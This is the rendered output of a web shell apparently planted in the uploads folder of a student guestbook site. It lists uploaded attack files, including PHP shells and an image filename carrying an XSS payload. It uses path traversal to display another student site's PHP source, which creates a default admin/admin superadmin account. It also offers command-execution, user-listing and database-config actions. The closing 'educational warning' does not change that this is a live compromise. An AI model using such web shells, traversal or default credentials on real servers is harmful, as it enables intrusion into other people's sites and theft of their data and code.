🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../577320.klas4s23.mid-ica.nl/public_html/../public_html/stemzijzer/lib/functions.php

<?php
require_once __DIR__ . '/../config/config.php';

function db(): PDO {
    static $pdo = null;
    if ($pdo === null) {
        $dsn = 'mysql:host=' . DB_HOST . ';dbname=' . DB_NAME . ';charset=utf8mb4';
        $pdo = new PDO($dsn, DB_USER, DB_PASS, [
            PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
        ]);
    }
    return $pdo;
}

function h(string $v): string {
    return htmlspecialchars($v, ENT_QUOTES, 'UTF-8');
}

function redirect(string $path) {
    if (strpos($path, 'http') !== 0) {
        $path = $path[0] === '/' ? $path : '/' . $path;
        $path = BASE_URL . $path;
    }
    header('Location: ' . $path);
    exit;
}

function start_session() {
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
}

function csrf_token(): string {
    start_session();
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

function csrf_field(): string {
    return '<input type="hidden" name="csrf" value="' . h(csrf_token()) . '">';
}

function verify_csrf(): bool {
    start_session();
    return isset($_POST['csrf']) && hash_equals($_SESSION['csrf'] ?? '', $_POST['csrf']);
}

function flash_set(string $type, string $msg) {
    start_session();
    $_SESSION['flash'][] = ['type' => $type, 'msg' => $msg];
}

function flash_show(): string {
    start_session();
    $out = '';
    if (!empty($_SESSION['flash'])) {
        foreach ($_SESSION['flash'] as $f) {
            $cls = $f['type'] === 'error' ? 'alert error' : 'alert success';
            $out .= '<div class="' . $cls . '">' . h($f['msg']) . '</div>';
        }
        unset($_SESSION['flash']);
    }
    return $out;
}

function ensure_default_admin() {
    // Create default superadmin (admin/admin) if not present
    $pdo = db();
    $stmt = $pdo->prepare("SELECT id FROM users WHERE username = 'admin' LIMIT 1");
    $stmt->execute();
    if (!$stmt->fetch()) {
        $hash = password_hash('admin', PASSWORD_DEFAULT);
        $pdo->prepare("INSERT INTO users (username, password_hash, role) VALUES ('admin', :hash, 'superadmin')")
            ->execute([':hash' => $hash]);
    }
}

function count_table(string $table): int {
    $pdo = db();
    return (int) $pdo->query("SELECT COUNT(*) FROM {$table}")->fetchColumn();
}

function save_logo(array $file): ?string {
    if (empty($file['name']) || $file['error'] === UPLOAD_ERR_NO_FILE) {
        return null;
    }
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload mislukt.');
    }
    if ($file['size'] > 2 * 1024 * 1024) {
        throw new RuntimeException('Bestand te groot (max 2MB).');
    }
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/jpg' => 'jpg'];
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('Alleen PNG en JPG zijn toegestaan.');
    }
    if (!is_dir(UPLOAD_DIR)) {
        @mkdir(UPLOAD_DIR, 0775, true);
    }
    $name = bin2hex(random_bytes(8)) . '.' . $allowed[$mime];
    $dest = UPLOAD_DIR . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Kon bestand niet opslaan.');
    }
    // Web path
    return 'assets/uploads/' . $name;
}

/**
 * Check if a table contains a specific column (MySQL only).
 */
function table_has_column(string $table, string $column): bool {
    try {
        $pdo = db();
        $stmt = $pdo->prepare("SHOW COLUMNS FROM `" . str_replace("`", "``", $table) . "` LIKE :col");
        $stmt->execute([':col' => $column]);
        return (bool)$stmt->fetch();
    } catch (Throwable $e) {
        return false;
    }
}

function party_position(int $partyId, int $questionId): ?string {
    $pdo = db();
    $stmt = $pdo->prepare("SELECT position FROM party_positions WHERE party_id = :p AND question_id = :q");
    $stmt->execute([':p' => $partyId, ':q' => $questionId]);
    $row = $stmt->fetch();
    return $row['position'] ?? null;
}

function set_party_position(int $partyId, int $questionId, string $pos): void {
    $pdo = db();
    $pos = in_array($pos, ['pro', 'neutral', 'contra'], true) ? $pos : 'neutral';
    $pdo->prepare("
        INSERT INTO party_positions (party_id, question_id, position)
        VALUES (:p, :q, :pos)
        ON DUPLICATE KEY UPDATE position = VALUES(position)
    ")->execute([':p' => $partyId, ':q' => $questionId, ':pos' => $pos]);
}

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!